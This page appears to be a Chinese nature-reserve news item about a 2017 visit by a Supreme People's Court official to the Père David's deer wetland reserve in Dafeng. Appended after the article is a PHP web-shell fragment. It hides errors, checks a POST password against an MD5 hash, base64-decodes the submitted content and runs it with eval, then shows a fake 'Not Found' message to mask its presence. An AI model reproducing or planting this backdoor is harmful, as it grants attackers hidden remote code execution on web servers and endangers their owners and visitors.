最新要闻

首页 > 最新要闻 >

    最高法院党组成员、审委会委员孙华璞来麋鹿保护区考察调研

           2017年9月5日,最高法院党组成员、审委会委员孙华璞一行来麋鹿保护区调研沿海滩涂湿地保护工作。盐城市委常委、大丰区委书记王荣,麋鹿保护区相关领导陪同调研。
           孙华璞一行先在中华麋鹿园游客中心展厅观看了电教片《归来的麋鹿》,了解了麋鹿与这片湿地的关系。随后乘坐电瓶游览车进入半野生麋鹿生活区,近距离感受了麋鹿生存的湿地环境。他们还与今年首次进行人工驯养的小麋鹿亲密互动,并称这是麋鹿饲养史上的一次突破性尝试。他们对麋鹿保护区将大面积原生态的湿地环境保护的如此之好表示赞叹。孙华璞强调滩涂湿地是麋鹿赖以生存的环境,是维持地球生态平衡的重要资源,一定要不遗余力地去保护湿地和滩涂,这样不仅仅是保护麋鹿也是保护我们人类自己。

     

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>